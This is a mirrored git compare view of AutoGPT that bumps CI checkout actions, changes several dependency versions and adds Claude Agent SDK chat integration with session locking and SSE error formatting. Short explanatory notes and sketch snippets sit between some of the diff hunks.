Mirror of https://github.com/Significant-Gravitas/AutoGPT.git
Synced 2026-02-12 07:45:14 -05:00

Compare commits: 65 commits, chore/comb ... feat/copit
Commits (SHA1):
d7f7a2747f, 68849e197c, 211478bb29, 0e88dd15b2, 7f3c227f0a, 40b58807ab, d0e2e6f013, efdc8d73cc, a34810d8a2, 038b7d5841,
cac93b0cc9, 2025aaf5f2, ae9bce3bae, 3107d889fc, f174fb6303, 920a4c5f15, e95fadbb86, b14b3803ad, 36aeb0b2b3, 2a189c44c4,
508759610f, 062fe1aa70, 82c483d6c8, 7cffa1895f, 9791bdd724, 750a674c78, 960c7980a3, e85d437bb2, 2cd0d4fe0f, 44f9536bd6,
1c1085a227, d7ef70469e, 1926127ddd, 8b509e56de, acb2d0bd1b, 51aa369c80, 6403ffe353, c40a98ba3c, a31fc8b162, 0f2d1a6553,
87d817b83b, acf932bf4f, f562d9a277, 3c92a96504, 8b8e1df739, 602a0a4fb1, 8d7d531ae0, 43153a12e0, 587e11c60a, 57da545e02,
626980bf27, e42b27af3c, 34face15d2, 7d32c83f95, 6e2a45b84e, 32f6532e9c, 0bbe8a184d, 7592deed63, b9c759ce4f, 5efb80d47b,
b49d8e2cba, 452544530d, 32ee7e6cf8, 670663c406, 0dbe4cf51e
@@ -22,7 +22,7 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           ref: ${{ github.event.workflow_run.head_branch }}
           fetch-depth: 0
.github/workflows/claude-dependabot.yml (vendored): 2 lines changed
@@ -30,7 +30,7 @@ jobs:
       actions: read # Required for CI access
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 1
 
.github/workflows/claude.yml (vendored): 2 lines changed
@@ -40,7 +40,7 @@ jobs:
       actions: read # Required for CI access
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 1
 
.github/workflows/codeql.yml (vendored): 2 lines changed
@@ -58,7 +58,7 @@ jobs:
     # your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
 
       # Initializes the CodeQL tools for scanning.
       - name: Initialize CodeQL
.github/workflows/copilot-setup-steps.yml (vendored): 2 lines changed
@@ -27,7 +27,7 @@ jobs:
     # If you do not check out your code, Copilot will do this for you.
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 0
           submodules: true
.github/workflows/docs-block-sync.yml (vendored): 2 lines changed
@@ -23,7 +23,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 1
 
.github/workflows/docs-claude-review.yml (vendored): 2 lines changed
@@ -23,7 +23,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 0
 
.github/workflows/docs-enhance.yml (vendored): 2 lines changed
@@ -28,7 +28,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 1
 
@@ -25,7 +25,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           ref: ${{ github.event.inputs.git_ref || github.ref_name }}
 
@@ -17,7 +17,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           ref: ${{ github.ref_name || 'master' }}
 
.github/workflows/platform-backend-ci.yml (vendored): 2 lines changed
@@ -68,7 +68,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 0
           submodules: true
.github/workflows/platform-frontend-ci.yml (vendored): 10 lines changed
@@ -31,7 +31,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
 
       - name: Check for component changes
         uses: dorny/paths-filter@v3
@@ -71,7 +71,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
 
       - name: Set up Node.js
         uses: actions/setup-node@v6
@@ -107,7 +107,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           fetch-depth: 0
 
@@ -148,7 +148,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           submodules: recursive
 
@@ -277,7 +277,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
           submodules: recursive
 
.github/workflows/platform-fullstack-ci.yml (vendored): 4 lines changed
@@ -29,7 +29,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
 
       - name: Set up Node.js
         uses: actions/setup-node@v6
@@ -63,7 +63,7 @@ jobs:
 
     steps:
       - name: Checkout repository
-        uses: actions/checkout@v4
+        uses: actions/checkout@v6
         with:
          submodules: recursive
 
.github/workflows/repo-workflow-checker.yml (vendored): 2 lines changed
@@ -11,7 +11,7 @@ jobs:
     steps:
       # - name: Wait some time for all actions to start
       #   run: sleep 30
-      - uses: actions/checkout@v4
+      - uses: actions/checkout@v6
       # with:
       #   fetch-depth: 0
       - name: Set up Python
autogpt_platform/autogpt_libs/poetry.lock (generated): 77 lines changed
@@ -1062,14 +1062,14 @@ urllib3 = ">=1.26.0,<3"
 
 [[package]]
 name = "launchdarkly-server-sdk"
-version = "9.15.0"
+version = "9.14.1"
 description = "LaunchDarkly SDK for Python"
 optional = false
-python-versions = ">=3.10"
+python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "launchdarkly_server_sdk-9.15.0-py3-none-any.whl", hash = "sha256:c267e29bfa3fb5e2a06a208448ada6ed5557a2924979b8d79c970b45d227c668"},
-    {file = "launchdarkly_server_sdk-9.15.0.tar.gz", hash = "sha256:f31441b74bc1a69c381db57c33116509e407a2612628ad6dff0a7dbb39d5020b"},
+    {file = "launchdarkly_server_sdk-9.14.1-py3-none-any.whl", hash = "sha256:a9e2bd9ecdef845cd631ae0d4334a1115e5b44257c42eb2349492be4bac7815c"},
+    {file = "launchdarkly_server_sdk-9.14.1.tar.gz", hash = "sha256:1df44baf0a0efa74d8c1dad7a00592b98bce7d19edded7f770da8dbc49922213"},
 ]
 
 [package.dependencies]
@@ -1478,14 +1478,14 @@ testing = ["coverage", "pytest", "pytest-benchmark"]
 
 [[package]]
 name = "postgrest"
-version = "2.28.0"
+version = "2.27.2"
 description = "PostgREST client for Python. This library provides an ORM interface to PostgREST."
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "postgrest-2.28.0-py3-none-any.whl", hash = "sha256:7bca2f24dd1a1bf8a3d586c7482aba6cd41662da6733045fad585b63b7f7df75"},
-    {file = "postgrest-2.28.0.tar.gz", hash = "sha256:c36b38646d25ea4255321d3d924ce70f8d20ec7799cb42c1221d6a818d4f6515"},
+    {file = "postgrest-2.27.2-py3-none-any.whl", hash = "sha256:1666fef3de05ca097a314433dd5ae2f2d71c613cb7b233d0f468c4ffe37277da"},
+    {file = "postgrest-2.27.2.tar.gz", hash = "sha256:55407d530b5af3d64e883a71fec1f345d369958f723ce4a8ab0b7d169e313242"},
 ]
 
 [package.dependencies]
@@ -2135,21 +2135,21 @@ files = [
 
 [[package]]
 name = "pytest"
-version = "9.0.2"
+version = "8.4.1"
 description = "pytest: simple powerful testing with Python"
 optional = false
-python-versions = ">=3.10"
+python-versions = ">=3.9"
 groups = ["dev"]
 files = [
-    {file = "pytest-9.0.2-py3-none-any.whl", hash = "sha256:711ffd45bf766d5264d487b917733b453d917afd2b0ad65223959f59089f875b"},
-    {file = "pytest-9.0.2.tar.gz", hash = "sha256:75186651a92bd89611d1d9fc20f0b4345fd827c41ccd5c299a868a05d70edf11"},
+    {file = "pytest-8.4.1-py3-none-any.whl", hash = "sha256:539c70ba6fcead8e78eebbf1115e8b589e7565830d7d006a8723f19ac8a0afb7"},
+    {file = "pytest-8.4.1.tar.gz", hash = "sha256:7c67fd69174877359ed9371ec3af8a3d2b04741818c51e5e99cc1742251fa93c"},
 ]
 
 [package.dependencies]
 colorama = {version = ">=0.4", markers = "sys_platform == \"win32\""}
 exceptiongroup = {version = ">=1", markers = "python_version < \"3.11\""}
-iniconfig = ">=1.0.1"
-packaging = ">=22"
+iniconfig = ">=1"
+packaging = ">=20"
 pluggy = ">=1.5,<2"
 pygments = ">=2.7.2"
 tomli = {version = ">=1", markers = "python_version < \"3.11\""}
@@ -2248,14 +2248,14 @@ cli = ["click (>=5.0)"]
 
 [[package]]
 name = "realtime"
-version = "2.28.0"
+version = "2.27.2"
 description = ""
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "realtime-2.28.0-py3-none-any.whl", hash = "sha256:db1bd59bab9b1fcc9f9d3b1a073bed35bf4994d720e6751f10031a58d57a3836"},
-    {file = "realtime-2.28.0.tar.gz", hash = "sha256:d18cedcebd6a8f22fcd509bc767f639761eb218b7b2b6f14fc4205b6259b50fc"},
+    {file = "realtime-2.27.2-py3-none-any.whl", hash = "sha256:34a9cbb26a274e707e8fc9e3ee0a66de944beac0fe604dc336d1e985db2c830f"},
+    {file = "realtime-2.27.2.tar.gz", hash = "sha256:b960a90294d2cea1b3f1275ecb89204304728e08fff1c393cc1b3150739556b3"},
 ]
 
 [package.dependencies]
@@ -2265,21 +2265,20 @@ websockets = ">=11,<16"
 
 [[package]]
 name = "redis"
-version = "7.1.1"
+version = "6.2.0"
 description = "Python client for Redis database and key-value store"
 optional = false
-python-versions = ">=3.10"
+python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "redis-7.1.1-py3-none-any.whl", hash = "sha256:f77817f16071c2950492c67d40b771fa493eb3fccc630a424a10976dbb794b7a"},
-    {file = "redis-7.1.1.tar.gz", hash = "sha256:a2814b2bda15b39dad11391cc48edac4697214a8a5a4bd10abe936ab4892eb43"},
+    {file = "redis-6.2.0-py3-none-any.whl", hash = "sha256:c8ddf316ee0aab65f04a11229e94a64b2618451dab7a67cb2f77eb799d872d5e"},
+    {file = "redis-6.2.0.tar.gz", hash = "sha256:e821f129b75dde6cb99dd35e5c76e8c49512a5a0d8dfdc560b2fbd44b85ca977"},
 ]
 
 [package.dependencies]
 async-timeout = {version = ">=4.0.3", markers = "python_full_version < \"3.11.3\""}
 
 [package.extras]
-circuit-breaker = ["pybreaker (>=1.4.0)"]
 hiredis = ["hiredis (>=3.2.0)"]
 jwt = ["pyjwt (>=2.9.0)"]
 ocsp = ["cryptography (>=36.0.1)", "pyopenssl (>=20.0.1)", "requests (>=2.31.0)"]
@@ -2437,14 +2436,14 @@ full = ["httpx (>=0.27.0,<0.29.0)", "itsdangerous", "jinja2", "python-multipart
 
 [[package]]
 name = "storage3"
-version = "2.28.0"
+version = "2.27.2"
 description = "Supabase Storage client for Python."
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "storage3-2.28.0-py3-none-any.whl", hash = "sha256:ecb50efd2ac71dabbdf97e99ad346eafa630c4c627a8e5a138ceb5fbbadae716"},
-    {file = "storage3-2.28.0.tar.gz", hash = "sha256:bc1d008aff67de7a0f2bd867baee7aadbcdb6f78f5a310b4f7a38e8c13c19865"},
+    {file = "storage3-2.27.2-py3-none-any.whl", hash = "sha256:e6f16e7a260729e7b1f46e9bf61746805a02e30f5e419ee1291007c432e3ec63"},
+    {file = "storage3-2.27.2.tar.gz", hash = "sha256:cb4807b7f86b4bb1272ac6fdd2f3cfd8ba577297046fa5f88557425200275af5"},
 ]
 
 [package.dependencies]
@@ -2488,35 +2487,35 @@ python-dateutil = ">=2.6.0"
 
 [[package]]
 name = "supabase"
-version = "2.28.0"
+version = "2.27.2"
 description = "Supabase client for Python."
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "supabase-2.28.0-py3-none-any.whl", hash = "sha256:42776971c7d0ccca16034df1ab96a31c50228eb1eb19da4249ad2f756fc20272"},
-    {file = "supabase-2.28.0.tar.gz", hash = "sha256:aea299aaab2a2eed3c57e0be7fc035c6807214194cce795a3575add20268ece1"},
+    {file = "supabase-2.27.2-py3-none-any.whl", hash = "sha256:d4dce00b3a418ee578017ec577c0e5be47a9a636355009c76f20ed2faa15bc54"},
+    {file = "supabase-2.27.2.tar.gz", hash = "sha256:2aed40e4f3454438822442a1e94a47be6694c2c70392e7ae99b51a226d4293f7"},
 ]
 
 [package.dependencies]
 httpx = ">=0.26,<0.29"
-postgrest = "2.28.0"
-realtime = "2.28.0"
-storage3 = "2.28.0"
-supabase-auth = "2.28.0"
-supabase-functions = "2.28.0"
+postgrest = "2.27.2"
+realtime = "2.27.2"
+storage3 = "2.27.2"
+supabase-auth = "2.27.2"
+supabase-functions = "2.27.2"
 yarl = ">=1.22.0"
 
 [[package]]
 name = "supabase-auth"
-version = "2.28.0"
+version = "2.27.2"
 description = "Python Client Library for Supabase Auth"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "supabase_auth-2.28.0-py3-none-any.whl", hash = "sha256:2ac85026cc285054c7fa6d41924f3a333e9ec298c013e5b5e1754039ba7caec9"},
-    {file = "supabase_auth-2.28.0.tar.gz", hash = "sha256:2bb8f18ff39934e44b28f10918db965659f3735cd6fbfcc022fe0b82dbf8233e"},
+    {file = "supabase_auth-2.27.2-py3-none-any.whl", hash = "sha256:78ec25b11314d0a9527a7205f3b1c72560dccdc11b38392f80297ef98664ee91"},
+    {file = "supabase_auth-2.27.2.tar.gz", hash = "sha256:0f5bcc79b3677cb42e9d321f3c559070cfa40d6a29a67672cc8382fb7dc2fe97"},
 ]
 
 [package.dependencies]
@@ -2526,14 +2525,14 @@ pyjwt = {version = ">=2.10.1", extras = ["crypto"]}
 
 [[package]]
 name = "supabase-functions"
-version = "2.28.0"
+version = "2.27.2"
 description = "Library for Supabase Functions"
 optional = false
 python-versions = ">=3.9"
 groups = ["main"]
 files = [
-    {file = "supabase_functions-2.28.0-py3-none-any.whl", hash = "sha256:30bf2d586f8df285faf0621bb5d5bb3ec3157234fc820553ca156f009475e4ae"},
-    {file = "supabase_functions-2.28.0.tar.gz", hash = "sha256:db3dddfc37aca5858819eb461130968473bd8c75bd284581013958526dac718b"},
+    {file = "supabase_functions-2.27.2-py3-none-any.whl", hash = "sha256:db480efc669d0bca07605b9b6f167312af43121adcc842a111f79bea416ef754"},
+    {file = "supabase_functions-2.27.2.tar.gz", hash = "sha256:d0c8266207a94371cb3fd35ad3c7f025b78a97cf026861e04ccd35ac1775f80b"},
 ]
 
 [package.dependencies]
@@ -2912,4 +2911,4 @@ type = ["pytest-mypy"]
 [metadata]
 lock-version = "2.1"
 python-versions = ">=3.10,<4.0"
-content-hash = "3f738dbf158a0b9319387d7251cd557e8e143d4dec809c5ab720321d2b53e368"
+content-hash = "40eae94995dc0a388fa832ed4af9b6137f28d5b5ced3aaea70d5f91d4d9a179d"
pyproject.toml (path not captured in this view):
@@ -13,17 +13,17 @@ cryptography = "^46.0"
 expiringdict = "^1.2.2"
 fastapi = "^0.128.0"
 google-cloud-logging = "^3.13.0"
-launchdarkly-server-sdk = "^9.15.0"
+launchdarkly-server-sdk = "^9.14.1"
 pydantic = "^2.12.5"
 pydantic-settings = "^2.12.0"
 pyjwt = { version = "^2.11.0", extras = ["crypto"] }
-redis = "^7.1.1"
-supabase = "^2.28.0"
+redis = "^6.2.0"
+supabase = "^2.27.2"
 uvicorn = "^0.40.0"
 
 [tool.poetry.group.dev.dependencies]
 pyright = "^1.1.408"
-pytest = "^9.0.2"
+pytest = "^8.4.1"
 pytest-asyncio = "^1.3.0"
 pytest-mock = "^3.15.1"
 pytest-cov = "^7.0.0"
Dockerfile:
@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
     DEBIAN_FRONTEND=noninteractive
 ENV PATH=/opt/poetry/bin:$PATH
 
-# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
+# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
+# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
 RUN apt-get update && apt-get install -y \
     python3.13 \
     python3-pip \
     ffmpeg \
     imagemagick \
+    jq \
+    ripgrep \
+    tree \
     && rm -rf /var/lib/apt/lists/*
 
 # Copy only necessary files from builder
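The new Dockerfile comment ties the added CLI tools to ALLOWED_BASH_COMMANDS in security_hooks.py, a file not included in this compare. As a rough, hypothetical sketch only (the constant name comes from the comment; the set contents and the checking logic are assumptions for illustration), such a hook might gate agent shell commands like this:

import shlex

# Hypothetical allowlist; security_hooks.py is not shown in this diff.
ALLOWED_BASH_COMMANDS = {"jq", "rg", "tree", "ffmpeg", "convert"}  # assumed contents

def is_command_allowed(command_line: str) -> bool:
    """Allow a shell command only if its first token is on the allowlist."""
    try:
        tokens = shlex.split(command_line)
    except ValueError:  # unbalanced quotes and similar parse failures
        return False
    return bool(tokens) and tokens[0] in ALLOWED_BASH_COMMANDS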
config.py:
@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
     session_ttl: int = Field(default=43200, description="Session TTL in seconds")
 
     # Streaming Configuration
-    max_context_messages: int = Field(
-        default=50, ge=1, le=200, description="Maximum context messages"
-    )
-
     stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
-    max_retries: int = Field(default=3, description="Maximum number of retries")
+    max_retries: int = Field(
+        default=3,
+        description="Max retries for fallback path (SDK handles retries internally)",
+    )
     max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
     max_agent_schedules: int = Field(
         default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,17 @@ class ChatConfig(BaseSettings):
         description="Name of the prompt in Langfuse to fetch",
     )
 
+    # Claude Agent SDK Configuration
+    use_claude_agent_sdk: bool = Field(
+        default=True,
+        description="Use Claude Agent SDK for chat completions",
+    )
+    sdk_max_buffer_size: int = Field(
+        default=10 * 1024 * 1024,  # 10MB (default SDK is 1MB)
+        description="Max buffer size in bytes for SDK JSON message parsing. "
+        "Increase if tool outputs exceed the limit.",
+    )
+
     # Extended thinking configuration for Claude models
     thinking_enabled: bool = Field(
         default=True,
@@ -138,6 +148,17 @@ class ChatConfig(BaseSettings):
         v = os.getenv("CHAT_INTERNAL_API_KEY")
         return v
 
+    @field_validator("use_claude_agent_sdk", mode="before")
+    @classmethod
+    def get_use_claude_agent_sdk(cls, v):
+        """Get use_claude_agent_sdk from environment if not provided."""
+        # Check environment variable - default to True if not set
+        env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
+        if env_val:
+            return env_val in ("true", "1", "yes", "on")
+        # Default to True (SDK enabled by default)
+        return True if v is None else v
+
     # Prompt paths for different contexts
     PROMPT_PATHS: dict[str, str] = {
         "default": "prompts/chat_system.md",
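The validator above lets a deployment toggle the SDK path purely through the CHAT_USE_CLAUDE_AGENT_SDK environment variable. A standalone sketch of the same parsing rule (re-implemented here for illustration, not imported from the project):

import os

def sdk_enabled(explicit: bool | None = None) -> bool:
    # Mirrors get_use_claude_agent_sdk above: the env var wins if set,
    # then the explicitly provided value, then the True default.
    env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
    if env_val:
        return env_val in ("true", "1", "yes", "on")
    return True if explicit is None else explicit

os.environ["CHAT_USE_CLAUDE_AGENT_SDK"] = "off"
print(sdk_enabled())  # False: "off" is set but not in the accepted truthy set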
model.py:
@@ -273,9 +273,8 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
     try:
         session = ChatSession.model_validate_json(raw_session)
         logger.info(
-            f"Loading session {session_id} from cache: "
-            f"message_count={len(session.messages)}, "
-            f"roles={[m.role for m in session.messages]}"
+            f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
+            f"last_roles={[m.role for m in session.messages[-3:]]}"  # Last 3 roles
         )
         return session
     except Exception as e:
@@ -317,11 +316,9 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
         return None
 
     messages = prisma_session.Messages
-    logger.info(
-        f"Loading session {session_id} from DB: "
-        f"has_messages={messages is not None}, "
-        f"message_count={len(messages) if messages else 0}, "
-        f"roles={[m.role for m in messages] if messages else []}"
+    logger.debug(
+        f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
+        f"roles={[m.role for m in messages[-3:]] if messages else []}"  # Last 3 roles
     )
 
     return ChatSession.from_db(prisma_session, messages)
@@ -372,10 +369,9 @@ async def _save_session_to_db(
                 "function_call": msg.function_call,
             }
         )
-    logger.info(
-        f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
-        f"roles={[m['role'] for m in messages_data]}, "
-        f"start_sequence={existing_message_count}"
+    logger.debug(
+        f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
+        f"roles={[m['role'] for m in messages_data]}"
     )
     await chat_db.add_chat_messages_batch(
         session_id=session.session_id,
@@ -415,7 +411,7 @@ async def get_chat_session(
         logger.warning(f"Unexpected cache error for session {session_id}: {e}")
 
     # Fall back to database
-    logger.info(f"Session {session_id} not in cache, checking database")
+    logger.debug(f"Session {session_id} not in cache, checking database")
    session = await _get_session_from_db(session_id)
 
     if session is None:
@@ -432,7 +428,6 @@ async def get_chat_session(
     # Cache the session from DB
     try:
         await _cache_session(session)
-        logger.info(f"Cached session {session_id} from database")
     except Exception as e:
         logger.warning(f"Failed to cache session {session_id}: {e}")
 
@@ -497,6 +492,40 @@ async def upsert_chat_session(
     return session
 
 
+async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
+    """Atomically append a message to a session and persist it.
+
+    Acquires the session lock, re-fetches the latest session state,
+    appends the message, and saves — preventing message loss when
+    concurrent requests modify the same session.
+    """
+    lock = await _get_session_lock(session_id)
+
+    async with lock:
+        session = await get_chat_session(session_id)
+        if session is None:
+            raise ValueError(f"Session {session_id} not found")
+
+        session.messages.append(message)
+        existing_message_count = await chat_db.get_chat_session_message_count(
+            session_id
+        )
+
+        try:
+            await _save_session_to_db(session, existing_message_count)
+        except Exception as e:
+            raise DatabaseError(
+                f"Failed to persist message to session {session_id}"
+            ) from e
+
+        try:
+            await _cache_session(session)
+        except Exception as e:
+            logger.warning(f"Cache write failed for session {session_id}: {e}")
+
+        return session
+
+
 async def create_chat_session(user_id: str) -> ChatSession:
     """Create a new chat session and persist it.
 
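Without this helper, two concurrent requests could each read the session, append their own message, and save, with the second save silently dropping the first message. A self-contained toy demonstration of the serialized fetch-append-save pattern (a per-id asyncio.Lock is an assumption; the diff awaits _get_session_lock but does not show its implementation):

import asyncio

_locks: dict[str, asyncio.Lock] = {}

async def get_lock(session_id: str) -> asyncio.Lock:
    # Assumed shape of the lock helper: one lock per session id.
    return _locks.setdefault(session_id, asyncio.Lock())

async def append(store: dict[str, list[str]], session_id: str, msg: str) -> None:
    async with await get_lock(session_id):
        messages = list(store.get(session_id, []))  # re-fetch inside the lock
        messages.append(msg)
        await asyncio.sleep(0)  # yield point where an unlocked writer would race
        store[session_id] = messages  # save

async def main() -> None:
    store: dict[str, list[str]] = {}
    await asyncio.gather(*(append(store, "s1", f"m{i}") for i in range(5)))
    print(store["s1"])  # all five messages survive; nothing is overwritten

asyncio.run(main())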
@@ -603,13 +632,19 @@ async def update_session_title(session_id: str, title: str) -> bool:
             logger.warning(f"Session {session_id} not found for title update")
             return False
 
-        # Invalidate cache so next fetch gets updated title
+        # Update title in cache if it exists (instead of invalidating).
+        # This prevents race conditions where cache invalidation causes
+        # the frontend to see stale DB data while streaming is still in progress.
         try:
-            redis_key = _get_session_cache_key(session_id)
-            async_redis = await get_redis_async()
-            await async_redis.delete(redis_key)
+            cached = await _get_session_from_cache(session_id)
+            if cached:
+                cached.title = title
+                await _cache_session(cached)
         except Exception as e:
-            logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
+            # Not critical - title will be correct on next full cache refresh
+            logger.warning(
+                f"Failed to update title in cache for session {session_id}: {e}"
+            )
 
         return True
     except Exception as e:
response_model.py:
@@ -10,6 +10,8 @@ from typing import Any
 
 from pydantic import BaseModel, Field
 
+from backend.util.json import dumps as json_dumps
+
 
 class ResponseType(str, Enum):
     """Types of streaming responses following AI SDK protocol."""
@@ -193,6 +195,18 @@ class StreamError(StreamBaseResponse):
         default=None, description="Additional error details"
     )
 
+    def to_sse(self) -> str:
+        """Convert to SSE format, only emitting fields required by AI SDK protocol.
+
+        The AI SDK uses z.strictObject({type, errorText}) which rejects
+        any extra fields like `code` or `details`.
+        """
+        data = {
+            "type": self.type.value,
+            "errorText": self.errorText,
+        }
+        return f"data: {json_dumps(data)}\n\n"
+
+
 class StreamHeartbeat(StreamBaseResponse):
     """Heartbeat to keep SSE connection alive during long-running operations.
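Concretely, the override strips StreamError down to the two keys the client's strict schema accepts. A minimal sketch of the resulting frame (the literal "error" type string is an assumption about ResponseType, and json.dumps stands in for the project's json_dumps):

import json

def to_sse(payload: dict) -> str:
    # Same SSE framing as the diff: one JSON object per data line, blank-line terminated.
    return f"data: {json.dumps(payload)}\n\n"

print(to_sse({"type": "error", "errorText": "An error occurred. Please try again."}))
# data: {"type": "error", "errorText": "An error occurred. Please try again."}
# A frame that also carried "code" or "details" would fail the client's strictObject check.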
routes.py:
@@ -1,5 +1,6 @@
 """Chat API routes for chat session management and streaming via SSE."""
 
+import asyncio
 import logging
 import uuid as uuid_module
 from collections.abc import AsyncGenerator
@@ -16,8 +17,16 @@ from . import service as chat_service
 from . import stream_registry
 from .completion_handler import process_operation_failure, process_operation_success
 from .config import ChatConfig
-from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
-from .response_model import StreamFinish, StreamHeartbeat
+from .model import (
+    ChatMessage,
+    ChatSession,
+    append_and_save_message,
+    create_chat_session,
+    get_chat_session,
+    get_user_sessions,
+)
+from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
+from .sdk import service as sdk_service
 from .tools.models import (
     AgentDetailsResponse,
     AgentOutputResponse,
@@ -40,6 +49,7 @@ from .tools.models import (
     SetupRequirementsResponse,
     UnderstandingUpdatedResponse,
 )
+from .tracking import track_user_message
 
 config = ChatConfig()
 
@@ -231,6 +241,10 @@ async def get_session(
     active_task, last_message_id = await stream_registry.get_active_task_for_session(
         session_id, user_id
     )
+    logger.info(
+        f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
+        f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
+    )
     if active_task:
         # Filter out the in-progress assistant message from the session response.
         # The client will receive the complete assistant response through the SSE
@@ -300,10 +314,9 @@ async def stream_chat_post(
         f"user={user_id}, message_len={len(request.message)}",
         extra={"json_fields": log_meta},
     )
-
     session = await _validate_and_get_session(session_id, user_id)
     logger.info(
-        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
+        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
         extra={
             "json_fields": {
                 **log_meta,
@@ -312,6 +325,25 @@ async def stream_chat_post(
             },
     )
 
+    # Atomically append user message to session BEFORE creating task to avoid
+    # race condition where GET_SESSION sees task as "running" but message isn't
+    # saved yet. append_and_save_message re-fetches inside a lock to prevent
+    # message loss from concurrent requests.
+    if request.message:
+        message = ChatMessage(
+            role="user" if request.is_user_message else "assistant",
+            content=request.message,
+        )
+        if request.is_user_message:
+            track_user_message(
+                user_id=user_id,
+                session_id=session_id,
+                message_length=len(request.message),
+            )
+        logger.info(f"[STREAM] Saving user message to session {session_id}")
+        session = await append_and_save_message(session_id, message)
+        logger.info(f"[STREAM] User message saved for session {session_id}")
+
     # Create a task in the stream registry for reconnection support
     task_id = str(uuid_module.uuid4())
     operation_id = str(uuid_module.uuid4())
@@ -327,7 +359,7 @@
         operation_id=operation_id,
     )
     logger.info(
-        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
+        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
         extra={
             "json_fields": {
                 **log_meta,
@@ -348,15 +380,43 @@
         first_chunk_time, ttfc = None, None
         chunk_count = 0
         try:
-            async for chunk in chat_service.stream_chat_completion(
+            # Emit a start event with task_id for reconnection
+            start_chunk = StreamStart(messageId=task_id, taskId=task_id)
+            await stream_registry.publish_chunk(task_id, start_chunk)
+            logger.info(
+                f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": (time_module.perf_counter() - gen_start_time)
+                        * 1000,
+                    }
+                },
+            )
+
+            # Choose service based on configuration
+            use_sdk = config.use_claude_agent_sdk
+            stream_fn = (
+                sdk_service.stream_chat_completion_sdk
+                if use_sdk
+                else chat_service.stream_chat_completion
+            )
+            logger.info(
+                f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
+                extra={"json_fields": log_meta},
+            )
+            # Pass message=None since we already added it to the session above
+            async for chunk in stream_fn(
                 session_id,
-                request.message,
+                None,  # Message already in session
                 is_user_message=request.is_user_message,
                 user_id=user_id,
-                session=session,  # Pass pre-fetched session to avoid double-fetch
+                session=session,  # Pass session with message already added
                 context=request.context,
-                _task_id=task_id,  # Pass task_id so service emits start with taskId for reconnection
             ):
+                # Skip duplicate StreamStart — we already published one above
